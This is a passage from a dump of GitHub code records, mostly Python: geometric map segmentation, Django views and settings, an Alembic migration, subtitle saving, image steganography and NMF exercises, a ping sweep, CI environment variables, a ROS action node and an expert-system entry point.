slope1\n \n return (lat, lon)\n \n def slope(self):\n line1_lat_start = self.start[0]\n line1_lon_start = self.start[1]\n \n line1_lat_end = self.end[0]\n line1_lon_end = self.end[1]\n\n try:\n slope = (line1_lat_end - line1_lat_start)/(line1_lon_end - line1_lon_start)\n except ZeroDivisionError:\n slope = math.nan\n\n return slope\n \n def includes_point(self, point):\n \n point_lat = point[0]\n point_lon = point[1]\n \n line1_lat_start = self.start[0]\n line1_lon_start = self.start[1]\n\n line1_lat_end = self.end[0]\n line1_lon_end = self.end[1]\n \n if point_lat >= self.start[0] and point_lat <= self.end[0] and point_lon >= self.start[1] and point_lon <= self.end[1]:\n if point_lat == line1_lat_start + point_lon * (line1_lon_end - line1_lon_start)/(line1_lat_end - line1_lat_start):\n return True\n return False\n \n def lat(self,lon):\n line1_lat_start = self.start[0]\n lat = self.start[0] + (lon - self.start[1])*self.slope()\n return lat\n \n def intersects(self, line):\n line1_lat_min = round(min(self.start[0], self.end[0]), 12)\n line1_lat_max = round(max(self.start[0], self.end[0]), 12)\n line1_lon_min = round(min(self.start[1], self.end[1]), 12)\n line1_lon_max = round(max(self.start[1], self.end[1]), 12)\n \n line2_lat_min = round(min(line.start[0], line.end[0]), 12)\n line2_lat_max = round(max(line.start[0], line.end[0]), 12)\n line2_lon_min = round(min(line.start[1], line.end[1]), 12)\n line2_lon_max = round(max(line.start[1], line.end[1]), 12)\n\n ray_intersection_point = self.ray_intersection(line)\n\n if isinstance(ray_intersection_point, float):\n if math.isnan(ray_intersection_point):\n return False\n else:\n raise ValueError('float that is non a nan was returned from the ray_intersection')\n elif ray_intersection_point == self:\n if line1_lat_min == line1_lat_max:\n return (line2_lon_min <= line1_lon_max and line2_lon_max >= line1_lon_min)\n else:\n return (line2_lat_min <= line1_lat_max and line2_lat_max >= line1_lat_min)\n elif isinstance(ray_intersection_point, tuple):\n lat = round(ray_intersection_point[0], 12)\n lon = round(ray_intersection_point[1], 12)\n return (line2_lat_min <= lat and line2_lat_max >= lat and\n line1_lat_min <= lat and line1_lat_max >= lat\n and\n line2_lon_min <= lon and line2_lon_max >= lon and\n line1_lon_min <= lon and line1_lon_max >= lon)\n else:\n raise ValueError('unexpected value returned from ray_intersection')\n \n def find_sections(self):\n lat_start = self.start[0]\n lon_start = self.start[1]\n lat_end = self.end[0]\n lon_end = self.end[1]\n \n rounded_lat_start = math.floor(self.start[0]*100)/100\n rounded_lon_start = math.floor(self.start[1]*100)/100\n rounded_lat_end = math.floor(self.end[0]*100)/100\n rounded_lon_end = math.floor(self.end[1]*100)/100\n \n sections = [(round(rounded_lat_start, 2), round(rounded_lon_start, 2))]\n \n if rounded_lat_start == rounded_lat_end and rounded_lon_start == rounded_lon_end:\n return sections\n \n if rounded_lat_start != rounded_lat_end:\n crossed_lats = round((rounded_lat_end - rounded_lat_start)*100)\n crossed_lons = round((rounded_lon_end - rounded_lon_start)*100)\n for i in range(0, crossed_lats + 1):\n for j in range(0, crossed_lons + 1):\n section_node = (round(rounded_lat_start + 0.01*i, 2), round(rounded_lon_start + 0.01*j, 2))\n if (section_node) not in sections:\n crossing_lat = GeoLine((rounded_lat_start + 0.01*i, rounded_lon_start + 0.01*j),\n (rounded_lat_start + 0.01*(i+1), rounded_lon_start + 0.01*j))\n crossing_lon = GeoLine((rounded_lat_start + 0.01*i, rounded_lon_start + 0.01*j),\n (rounded_lat_start + 0.01*i, rounded_lon_start + 0.01*(j + 1)))\n \n lat_crossed = self.intersects(crossing_lat)\n lon_crossed = self.intersects(crossing_lon)\n \n if lat_crossed or lon_crossed:\n sections.append(section_node)\n \n return sections\n\n\n \n# lat= line1_lat_start + (lon - line1_lon_start) * slope1\n# lat= line2_lat_start + (lon - line2_lon_start) * slope2\n \n# lon = (line2_lat_start - line1_lat_start) / \\\n# ( (line1_lon_end - line1_lon_start)/(line1_lat_end - line1_lat_start) -\\\n# (line2_lon_end - line2_lon_start)/(line2_lat_end - line2_lat_start) )\n\n# line1_lat_start + lon*slope1 - line1_lon_start*slope1 = line2_lat_start + lon*slope2 - line2_lon_start*slope2\n# lon(slope1-slope2) = line2_lat_start -line1_lat_start - line2_lon_start*slope2 + line1_lon_start*slope1\n \nif __name__ == '__main__': \n sections_dict = {}\n with open(\"E:\\Downloads\\Programming\\map\\sections.csv\", newline='') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n for row in csvreader:\n key = '-'.join((row[2], row[3]))\n sections_dict[key] = row[0]\n \n with open(\"E:\\Downloads\\Programming\\map\\dp_view_01.csv\", newline='') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n with open(\"E:\\Downloads\\Programming\\map\\mapped.sql\", \"w\") as result_file:\n result_file.truncate()\n result_file.write(\"INSERT INTO line_sections (section_id, qline_id) VALUES\\n\")\n for row in csvreader:\n line_id = row[0]\n\n lat_1 = float(row[1])\n lon_1 = float(row[2])\n lat_2 = float(row[3])\n lon_2 = float(row[4])\n\n g_line = GeoLine((lat_1, lon_1), (lat_2, lon_2))\n sections = g_line.find_sections()\n\n for section in sections:\n section_lat = section[0]\n section_lon = section[1]\n\n section_key = '{0:.3f}-{1:.3f}'.format(section_lat, section_lon)\n section_id = sections_dict[section_key]\n\n file_line = '({0}, {1}),\\n'.format(section_id, line_id)\n result_file.write(file_line)\n","repo_name":"Glider-of-chaos/map-segmentation","sub_path":"map_segmentation.py","file_name":"map_segmentation.py","file_ext":"py","file_size_in_byte":9032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"17585028103","text":"from django.shortcuts import render,redirect\r\nfrom notification.models import UserObj,Notification\r\nfrom django.http import HttpResponseRedirect\r\n\r\n# Create your views here.\r\n\r\ndef seenNotification(request,pk):\r\n if request.user.is_authenticated:\r\n user_obj = UserObj.objects.get(user=request.user)\r\n notification_qs = Notification.objects.get(id=pk)\r\n notification_qs.userobj.remove(user_obj)\r\n notification_qs.is_read = True\r\n notification_qs.save()\r\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\r\n else:\r\n return redirect('login')\r\n","repo_name":"exact-coder/Fev_Ecom","sub_path":"notification/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14011532475","text":"\"\"\"Added Tables\n\nRevision ID: 82eb555dafa6\nRevises: 1c22ae5fc9bf\nCreate Date: 2023-05-16 14:39:29.436473\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '82eb555dafa6'\ndown_revision = '1c22ae5fc9bf'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('bikes')\n op.drop_table('lockers')\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('lockers',\n sa.Column('id', sa.INTEGER(), nullable=False),\n sa.Column('locker_location', sa.VARCHAR(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('bikes',\n sa.Column('id', sa.INTEGER(), nullable=False),\n sa.Column('name', sa.VARCHAR(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n","repo_name":"Dustin-Holloway/Phase-3-Group-Project-CLI","sub_path":"lib/db/migrations/versions/82eb555dafa6_added_tables.py","file_name":"82eb555dafa6_added_tables.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2461573628","text":"import aeidon\n\n\nclass SaveAgent(aeidon.Delegate):\n\n \"\"\"Writing subtitle data to file.\"\"\"\n\n def _save(self, doc, file, keep_changes):\n \"\"\"\n Write subtitle data from `doc` to `file`.\n\n Return indices of texts changed due to markup conversion.\n Raise :exc:`IOError` if writing fails.\n Raise :exc:`UnicodeError` if encoding fails.\n \"\"\"\n current_format = self.get_format(doc)\n orig_texts = [x.get_text(doc) for x in self.subtitles]\n indices = []\n if current_format is not None and file.format != current_format:\n # Convert markup if saving in different format.\n converter = aeidon.MarkupConverter(current_format, file.format)\n for i, subtitle in enumerate(self.subtitles):\n text = subtitle.get_text(doc)\n new_text = converter.convert(text)\n if new_text == text: continue\n subtitle.set_text(doc, new_text)\n indices.append(i)\n file.write(self.subtitles, doc)\n if keep_changes: return indices\n for i, subtitle in enumerate(self.subtitles):\n subtitle.set_text(doc, orig_texts[i])\n return []\n\n @aeidon.deco.export\n def save(self, doc, file=None, keep_changes=True):\n \"\"\"\n Write subtitle data from `doc` to `file`.\n\n `file` can be ``None`` to use existing file.\n Raise :exc:`IOError` if writing fails.\n Raise :exc:`UnicodeError` if encoding fails.\n \"\"\"\n if doc == aeidon.documents.MAIN:\n return self.save_main(file, keep_changes)\n if doc == aeidon.documents.TRAN:\n return self.save_translation(file, keep_changes)\n raise ValueError(\"Invalid document: {!r}\".format(doc))\n\n @aeidon.deco.export\n def save_main(self, file=None, keep_changes=True):\n \"\"\"\n Write subtitle data from main document to `file`.\n\n `file` can be ``None`` to use :attr:`main_file`.\n Raise :exc:`IOError` if writing fails.\n Raise :exc:`UnicodeError` if encoding fails.\n \"\"\"\n file = file or self.main_file\n if file is not None and self.main_file is not None:\n file.copy_from(self.main_file)\n indices = self._save(aeidon.documents.MAIN, file, keep_changes)\n if keep_changes:\n if (self.main_file is not None and\n file.mode != self.main_file.mode):\n # Apply possibly changed mode (times vs. frames).\n for i, subtitle in enumerate(self.subtitles):\n subtitle.mode = file.mode\n self.emit(\"positions-changed\", self.get_all_indices())\n self.main_file = file\n self.main_changed = 0\n self.emit(\"main-texts-changed\", indices)\n self.emit(\"main-file-saved\", file)\n\n @aeidon.deco.export\n def save_translation(self, file=None, keep_changes=True):\n \"\"\"\n Write subtitle data from translation document to `file`.\n\n `file` can be ``None`` to use :attr:`tran_file`.\n Raise :exc:`IOError` if writing fails.\n Raise :exc:`UnicodeError` if encoding fails.\n \"\"\"\n file = file or self.tran_file\n if file is not None and self.tran_file is not None:\n file.copy_from(self.tran_file)\n indices = self._save(aeidon.documents.TRAN, file, keep_changes)\n if keep_changes:\n self.tran_file = file\n self.tran_changed = 0\n self.emit(\"translation-texts-changed\", indices)\n self.emit(\"translation-file-saved\", file)\n","repo_name":"otsaloma/gaupol","sub_path":"aeidon/agents/save.py","file_name":"save.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","stars":225,"dataset":"github-code","pt":"19"} +{"seq_id":"6110488688","text":"from utils import *\n\n\ndef reveal_image(img_with_secret, nbits=1):\n jpeg_trailer = \"1111\" + \"1111\" + \"1101\" + \"1001\" # b\"\\xFF\\xD9\"\n\n nbits = clamp(nbits, 1, 8)\n image = image_with_secret.flatten()\n\n message = \"\"\n i = 0\n while i < image_with_secret.size:\n byte = bin(image[i])[2:].zfill(8)\n message += byte[-nbits:]\n i += 1\n\n trailer_end_pos = len(jpeg_trailer) # end index + 1\n while trailer_end_pos <= image_with_secret.size:\n if message[trailer_end_pos - len(jpeg_trailer): trailer_end_pos] == jpeg_trailer:\n break\n trailer_end_pos += 8\n\n img_bits_str = message[:trailer_end_pos]\n\n img_byte_chunks = [img_bits_str[i:i + 8] for i in range(0, len(img_bits_str), 8)]\n img_bytes_list = [bytes([int(byte, base=2)]) for byte in img_byte_chunks]\n img_bytes = b\"\".join(img_bytes_list)\n return img_bytes\n\n\nif __name__ == \"__main__\":\n image = load_image(\"images/rembrandt.png\")\n nbits = 1\n image_with_secret, _ = hide_image(image, \"images/spanish.jpg\", nbits)\n revealed_img = reveal_image(image_with_secret, nbits)\n\n revealed_img_path = \"images/revealed_img_no_length.jpg\"\n with open(revealed_img_path, \"wb\") as f_img:\n f_img.write(revealed_img)\n\n plt.imshow(load_image(revealed_img_path))\n plt.show()\n","repo_name":"plonajakub/image-engineering","sub_path":"lab5/exercises/ex5.py","file_name":"ex5.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"72903504683","text":"#simple -- v2 of split\n#split.py\n\nimport sys\nimport math\nimport numpy as np\nfrom PIL import Image\nfrom PIL import ImageOps\n\nfrom time import time\nfrom sklearn import decomposition\nfrom skimage import color, io, img_as_ubyte\n\n\ndef computeError(original, patterns):\n inv = np.linalg.pinv(patterns)\n c = np.matmul(original, inv)\n m_hat = np.matmul(c, patterns)\n return np.linalg.norm(original - m_hat)\n\ndef imageToMatrix(image, size):\n\ttiles = []\n\tresult = []\n\tfor y in range(image.height//size):\n\t\tfor x in range(image.width//size):\n\t\t\ttile = image.crop((x*size,y*size, (x+1)*size, (y+1)*size))\n\t\t\ttiles.append(tile)\n\n\tfor i in range(len(tiles)):\n\t\ta = np.asarray(tiles[i])\n\t\ta = a.flatten()\n\t\tresult.append(a)\n\treturn np.array(result)\n\ndef matrixToImage(tiles, width, height):\n\n\tsize = int(math.sqrt(len(tiles[0])))\n\tresult = Image.new('L', (width*size, height*size))\n\n\tindex = 0\n\tfor y in range(height):\n\t\tfor x in range(width):\n\t\t\ttile = tiles[index]\n\n\t\t\ttile = tile/np.max(tile)\n\t\t\ttile = tile*255\n\n\t\t\ttile = np.clip(np.rint(tile),a_min=0, a_max=255)\n\t\t\ttile = tile.astype(np.uint8)\n\n\t\t\timg = Image.fromarray(tile.reshape(size,size), mode=\"L\")\n\t\t\tresult.paste(img, (x*size, y*size, (x+1)*size, (y+1)*size))\n\t\t\tindex += 1\n\n\treturn result \n\nt0 = time()\nblockSize = 16\n\nsrc_img = Image.open('/scratch/prism2022data/training/AMRE/unit05-20150819003402_011372690_06947.png')\nsrc_img = ImageOps.grayscale(src_img)\nsrc_img = src_img.resize(((src_img.width//blockSize)*blockSize,(src_img.height//blockSize)*blockSize))\nprint(src_img.size)\n\n\ntile_matrix = imageToMatrix(src_img,blockSize)\nprint(tile_matrix)\n\n\n#n_samples, n_features = tile_matrix.shape\n#print('Samples: ' + str(n_samples))\n#print('Features: ' + str(n_features))\n\nn_components = 32\n\nprint(\"EXTRACTING THE TOP %d %s...\" % (n_components, 'Non-negative components - NMF'))\n#t0 = time()\nestim = decomposition.NMF(n_components=n_components, init='random', random_state=0, max_iter=10000, solver='mu')\nw = estim.fit_transform(tile_matrix)\n#train_time = (time() - t0)\n\n#print(\"Finished in %0.3fs\" % train_time)\n\nh = estim.components_\n\ne = computeError(tile_matrix, h) \nprint(f'ERROR: {e}')\n\nr_matrix = estim.inverse_transform(w)\n\n#print(recon)\n\nprint(r_matrix)\n\nresult_img = matrixToImage(r_matrix,src_img.width//blockSize, src_img.height//blockSize)\nresult_img.save(\"recon.png\")\n\npattern_img = matrixToImage(h,1, len(h))\npattern_img.save(\"patterns.png\")\n\nprint(h)\nprint(time() - t0)\n","repo_name":"jdymacek/MAFR","sub_path":"old/simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":2440,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"4488534278","text":"import subprocess\nimport os\n\nimport sys\n\n\ndef ping(ip):\n rc = subprocess.call('ping -c2 {} &>/dev/null'.format(ip), shell=True)\n if rc == 0:\n return '{}: up'.format(ip)\n else:\n return '{}: down'.format(ip)\n\n\nif __name__ == '__main__':\n ips = ['192.168.83.{}'.format(i) for i in range(1, 255)]\n for ip in ips:\n pid = os.fork()\n if not pid:\n print(ping(ip), end='\\t')\n sys.exit()\n","repo_name":"east4ming/pyEdu","sub_path":"day17/fork_ping.py","file_name":"fork_ping.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22767350760","text":"from django.db import models\nfrom mptt.models import MPTTModel, TreeForeignKey\n\n\nclass Article(models.Model):\n \"\"\"Article\"\"\"\n title = models.CharField(max_length=200)\n content = models.CharField(max_length=10000)\n\n def __str__(self):\n return self.title\n\n\nclass Comment(MPTTModel):\n \"\"\"Comment\"\"\"\n name = models.CharField(max_length=100)\n text = models.TextField(max_length=5000)\n article = models.ForeignKey(\n Article, \n on_delete=models.CASCADE,\n related_name='comment'\n )\n parent = TreeForeignKey(\n 'self',\n on_delete=models.CASCADE,\n null=True, blank=True,\n related_name='children'\n )\n\n def __str__(self):\n return self.name\n","repo_name":"42afedorov42/myblog","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15334770471","text":"import os\n\nimport sentry_sdk\nfrom sentry_sdk.integrations.celery import CeleryIntegration\nfrom sentry_sdk.integrations.django import DjangoIntegration\nfrom sentry_sdk.integrations.redis import RedisIntegration\n\nfrom .base import *\n\nDEBUG = False\n\n\n# Application definition\n\nALLOWED_HOSTS = ['covid19.paschal.xyz']\n\n\n# Database\n# https://docs.djangoproject.com/en/1.9/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': os.environ.get('DB_NAME'),\n 'USER': os.environ.get('DB_USER'),\n 'PASSWORD': os.environ.get('DB_PASSWORD'),\n 'HOST': os.environ.get('DB_HOST'),\n 'PORT': os.environ.get('DB_PORT')\n }\n}\n\n\n# Email settings\nEMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\nEMAIL_HOST = os.environ.get('EMAIL_HOST')\nEMAIL_PORT = os.environ.get('EMAIL_PORT')\nEMAIL_USE_TLS = True\nEMAIL_HOST_USER = os.environ.get('SENDGRID_USERNAME')\nEMAIL_HOST_PASSWORD = os.environ.get('SENDGRID_PASSWORD')\nSENDGRID_API_KEY = os.environ.get('SENDGRID_API_KEY')\n\n\n# Celery\nCELERY_BROKER_URL = 'redis://localhost:6379'\nCELERY_BROKER_TRANSPORT = 'redis'\nCELERY_RESULT_BACKEND = 'redis://localhost:6379'\nCELERY_ACCEPT_CONTENT = ['application/json']\nCELERY_TASK_SERIALIZER = 'json'\nCELERY_RESULT_SERIALIZER = 'json'\nCELERY_TIMEZONE = 'Africa/Lagos'\n\n\n# Sentry\nsentry_sdk.init(\n dsn=\"https://d5e034415489460c88bc7bb6904904fb@sentry.io/5186226\",\n integrations=[\n DjangoIntegration(),\n CeleryIntegration(),\n RedisIntegration()\n ]\n)\n","repo_name":"paschmaria/covid19_app","sub_path":"core/settings/prod.py","file_name":"prod.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"13194025432","text":"import os\nfrom typing import TypedDict\n\n# This package contains utilities that rely on environment variable\n# definitions present only on the CI container instance.\n\n# environment variables needed by CI\nclass CIEnvironment(TypedDict):\n # If not running under a CI pipeline defaults are provided that\n # will suffice to run scripts that do not use GHA API calls.\n # To manually provide environment variable settings, export GITHUB_ACTIONS=true, and provide\n # values for all of the environment variables listed.\n GITHUB_ACTIONS: str\n\n # This is used as a unique tag for all instances launched in a workflow\n GITHUB_RUN_ID: str\n\n GITHUB_SHA: str\n\n # Multiple clones of the FireSim repository exists on manager. We expect state\n # to persist between jobs in a workflow and faciliate that by having jobs run\n # out of a centralized clone (MANAGER_FIRESIM_LOCATION)-- not the default clones setup by\n # the GHA runners (GITHUB_WORKSPACE)\n\n # This is the location of the clone setup by the GHA runner infrastructure by default\n # expanduser to replace the ~ present in the default, for portability\n GITHUB_WORKSPACE: str\n\n # This is the location of the reused clone. CI scripts should refer variables\n # derived from this path so that they may be reused across workflows that may\n # initialize the FireSim repository differently (e.g., as a submodule of a\n # larger project.)\n MANAGER_FIRESIM_LOCATION: str\n\n GITHUB_TOKEN: str\n PERSONAL_ACCESS_TOKEN: str\n GITHUB_API_URL: str\n\n # We look this up, instead of hardcoding \"firesim/firesim\", to support running\n # this CI pipeline under forks.\n GITHUB_REPOSITORY: str\n\n GITHUB_EVENT_PATH: str\n\n # The following are environment variables used by AWS and AZURE to setup the corresponding\n # self-hosted Github Actions Runners\n AWS_ACCESS_KEY_ID: str\n AWS_SECRET_ACCESS_KEY: str\n AWS_DEFAULT_REGION: str\n AZURE_CLIENT_ID: str\n AZURE_CLIENT_SECRET: str\n AZURE_TENANT_ID: str\n AZURE_SUBSCRIPTION_ID: str\n AZURE_DEFAULT_REGION: str\n AZURE_RESOURCE_GROUP: str\n AZURE_CI_SUBNET_ID: str\n AZURE_CI_NSG_ID: str\n\n FIRESIM_PEM: str\n FIRESIM_PEM_PUBLIC: str\n\n # FireSim repo used on local CI machine to run tests from (cached across all workflow CI jobs)\n REMOTE_WORK_DIR: str\n\nRUN_LOCAL = os.environ.get('GITHUB_ACTIONS', 'false') == 'false'\n# When running locally (not in a CI pipeline) run commands out of the clone hosting this file.\nlocal_fsim_dir = os.path.normpath((os.path.realpath(__file__)) + \"/../../..\")\n\ndef get_ci_value(env_var: str, default_value: str = \"\") -> str:\n if RUN_LOCAL:\n return default_value\n else:\n return os.environ[env_var]\n\n# Create a env. dict that is populated from the environment or from defaults\nci_env: CIEnvironment = {\n 'GITHUB_ACTIONS': 'false' if RUN_LOCAL else 'true',\n 'GITHUB_RUN_ID': get_ci_value('GITHUB_RUN_ID'),\n 'GITHUB_SHA': get_ci_value('GITHUB_RUN_ID'),\n 'GITHUB_WORKSPACE': os.path.expanduser(os.environ['GITHUB_WORKSPACE']) if not RUN_LOCAL else local_fsim_dir,\n 'MANAGER_FIRESIM_LOCATION': os.path.expanduser(os.environ['MANAGER_FIRESIM_LOCATION']) if not RUN_LOCAL else local_fsim_dir,\n 'GITHUB_TOKEN': get_ci_value('GITHUB_TOKEN'),\n 'PERSONAL_ACCESS_TOKEN': get_ci_value('PERSONAL_ACCESS_TOKEN'),\n 'GITHUB_API_URL': get_ci_value('GITHUB_API_URL'),\n 'GITHUB_REPOSITORY': get_ci_value('GITHUB_REPOSITORY'),\n 'GITHUB_EVENT_PATH': get_ci_value('GITHUB_EVENT_PATH'),\n 'AWS_ACCESS_KEY_ID': get_ci_value('AWS_ACCESS_KEY_ID'),\n 'AWS_SECRET_ACCESS_KEY': get_ci_value('AWS_SECRET_ACCESS_KEY'),\n 'AWS_DEFAULT_REGION': get_ci_value('AWS_DEFAULT_REGION'),\n 'AZURE_CLIENT_ID': get_ci_value('AZURE_CLIENT_ID'),\n 'AZURE_CLIENT_SECRET': get_ci_value('AZURE_CLIENT_SECRET'),\n 'AZURE_TENANT_ID': get_ci_value('AZURE_TENANT_ID'),\n 'AZURE_SUBSCRIPTION_ID': get_ci_value('AZURE_SUBSCRIPTION_ID'),\n 'AZURE_DEFAULT_REGION': get_ci_value('AZURE_DEFAULT_REGION'),\n 'AZURE_RESOURCE_GROUP': get_ci_value('AZURE_RESOURCE_GROUP'),\n 'AZURE_CI_SUBNET_ID': get_ci_value('AZURE_CI_SUBNET_ID'),\n 'AZURE_CI_NSG_ID': get_ci_value('AZURE_CI_NSG_ID'),\n 'FIRESIM_PEM': get_ci_value('FIRESIM_PEM'),\n 'FIRESIM_PEM_PUBLIC': get_ci_value('FIRESIM_PEM_PUBLIC'),\n 'REMOTE_WORK_DIR': get_ci_value('REMOTE_WORK_DIR'),\n}\n","repo_name":"firesim/firesim","sub_path":".github/scripts/ci_variables.py","file_name":"ci_variables.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","stars":761,"dataset":"github-code","pt":"19"} +{"seq_id":"72694177003","text":"#!/usr/bin/env python3\n\nimport rospy\nimport actionlib\n\nfrom my_robot_msgs.msg import num_actionAction\nfrom my_robot_msgs.msg import num_actionGoal\nfrom my_robot_msgs.msg import num_actionResult\nfrom my_robot_msgs.msg import num_actionFeedback\n\nfrom my_robot_msgs.msg import action_csAction\nfrom my_robot_msgs.msg import action_csActionGoal\n\nclass sas_action_client:\n def __init__(self):\n self.increase = 10\n self.sas = actionlib.SimpleActionServer(\"/num_sac\",num_actionAction,execute_cb=self.on_goal,auto_start=False)\n self.sas.start()\n rospy.loginfo(\"Simple Action server has been started\")\n self._ac = actionlib.ActionClient(\"/numActionClient\",action_csAction)\n rospy.loginfo(\"Waiting for Action server\")\n \n self._ac.wait_for_server()\n \n def on_goal(self,goal):\n rospy.loginfo(\"Goal received\")\n rospy.loginfo(goal)\n rate = rospy.Rate(1)\n cnt = 0\n number = goal.bin_num\n while not cnt == self.increase:\n cnt += 1\n number += cnt\n percent = (cnt/(self.increase)) * 100\n feedb = num_actionFeedback()\n feedb.percentage_done = percent\n self.sas.publish_feedback(feedb)\n rate.sleep()\n \n res = num_actionResult()\n res.number = bin(number)[2:]\n self.sas.set_succeeded(res)\n rospy.loginfo(\"Result has been sent\") \n\n def send_goal(self):\n goal = action_csActionGoal()\n goal.num = self.increase\n goal_handle = self._ac.send_goal(goal,transition_cb=self.trans_callback,feedback_cb=self.feedb)\n return goal_handle\n\n def trans_callback(self,goal_handle):\n if goal_handle.get_comm_state() == 2:\n rospy.loginfo(\"Goal just went active\")\n if goal_handle.get_comm_state() == 7:\n rospy.loginfo(\"Goal is Done\")\n rospy.loginfo(goal_handle.get_terminal_state())\n rospy.loginfo(goal_handle.get_result())\n \n \n def feedb(self,goal_handle,feedback):\n rospy.loginfo(goal_handle)\n rospy.loginfo(feedback)\n\n\nif __name__ == \"__main__\":\n rospy.init_node(\"num_sas_and_action_client\")\n rospy.loginfo(\"Number SAS and Action Client has been initiated\")\n sas = sas_action_client()\n sas.send_goal()\n rospy.spin()\n ","repo_name":"GOLISHYAMP/ROS_prac","sub_path":"prac_ros_ws/src/my_robot_codes/scripts/number_sas_and_action_client.py","file_name":"number_sas_and_action_client.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21722307281","text":"# Types\nType_Groups = 'group', 'supergroup'\nType_Private = 'private'\nType_Restricted = 'restricted', 'left', 'kicked'\nType_Admins = 'creator', 'administrator'\nType_Creator = 'creator'\n\n# Variables\nToken = ''\nMainID = 0\nDefault_Language = ''\nLog_Path = 'Files\\\\Main.log'\nLog_Format = '%(asctime)s - %(name)s - %(levelname)s -> %(message)s'\n\n# Activities\nText = False\nAVNV = False\nDoc = False\nPhoto = False\nSticker = False\nLC = False\nNCM = False\nLCM = False\nNCT = False\n\n# Templates\nSearch = Type_Private + Type_Groups\nMenu = Type_Private\n\nSearch_Allowed = True\nMenu_Allowed = True\n","repo_name":"ParzivalllUser/EsmTorresBot","sub_path":"libs/Constant_Example.py","file_name":"Constant_Example.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18653810833","text":"from colorama import Fore, Back, Style\nfrom os import getenv\nfrom sys import argv\nimport readline\n\nfrom expert_system import ExpertSystem\n\ndef terminate_with_usage():\n\tprint(Style.BRIGHT + 'usage: ' + Style.RESET_ALL)\n\tprint('python3 ' + Fore.BLUE + 'main.py ' + Fore.RESET + '-h \\t\\t\\t (usage)')\n\tprint('python3 ' + Fore.BLUE + 'main.py ' + Fore.RESET + '\\t\\t\\t (start interactive session)')\n\tprint('python3 ' + Fore.BLUE + 'main.py ' + Fore.RESET + '-f ' + Fore.CYAN + 'filename' + Fore.RESET +\n\t\t'\\t\\t (process input file)')\n\tprint()\n\n\tprint(Style.BRIGHT + '[CMMANDS]' + Style.RESET_ALL)\n\tprint(Fore.BLUE + '@info' + Fore.RESET + \"\\t\\t\\t Display all rules and facts\")\n\tprint(Fore.BLUE + '@del index' + Fore.RESET + \"\\t\\t Delete rule at index\")\n\tprint(Fore.BLUE + '@verbose on|off' + Fore.RESET + \"\\t\\t Toggle verbose\")\n\tprint(Fore.BLUE + '@vis' + Fore.RESET + \"\\t\\t\\t Produce a complete graph pdf file\")\n\tprint(Fore.BLUE + '@reset' + Fore.RESET + \"\\t\\t\\t Reset the system\")\n\tprint(Fore.BLUE + '@dance' + Fore.RESET + '\\t\\t\\t ¯\\\\_(ツ)_/¯')\n\tprint(Fore.BLUE + '@doge' + Fore.RESET + '\\t\\t\\t ¯\\\\_(ツ)_/¯')\n\tquit()\n\ndef interactive_loop(expert_system):\n\tprompt = getenv('ES_PROMPT')\n\tif prompt is None or prompt == '':\n\t\tprompt = '🍔 Enter statement: '\n\twhile True:\n\t\tprint()\n\t\tstatement = input(prompt).strip()\n\t\tif statement.upper() == 'EXIT':\n\t\t\tbreak\n\t\texpert_system.process_statement(statement)\n\ndef process_file(expert_system, filename):\n\twith open(filename, 'r') as file:\n\t\tfor line in file:\n\t\t\tstatement = line.strip()\n\t\t\tif statement == '' or statement[0] == '#':\n\t\t\t\tprint(Fore.MAGENTA + statement + Fore.RESET)\n\t\t\telse:\n\t\t\t\texpert_system.process_statement(statement)\n\ndef main():\n\ttry:\n\t\texpert_system = ExpertSystem()\n\n\t\t# Interactive mode\n\t\tif len(argv) == 1:\n\t\t\tinteractive_loop(expert_system)\n\t\t# Usage mode\n\t\telif argv[1] == '-h':\n\t\t\tterminate_with_usage()\n\t\t# File-processing mode\n\t\telif argv[1] == '-f':\n\t\t\tif len(argv) != 3:\n\t\t\t\tterminate_with_usage()\n\t\t\tfilename = argv[2]\n\t\t\tprocess_file(expert_system, filename)\n\t\t# Nope mode\n\t\telse:\n\t\t\tterminate_with_usage()\n\texcept IOError as e:\n\t\tprint(Style.BRIGHT + Fore.RED + 'I/O Error: ' + Style.RESET_ALL + Fore.RESET + str(e))\n\texcept EOFError as e:\n\t\tpass\n\nif __name__ == 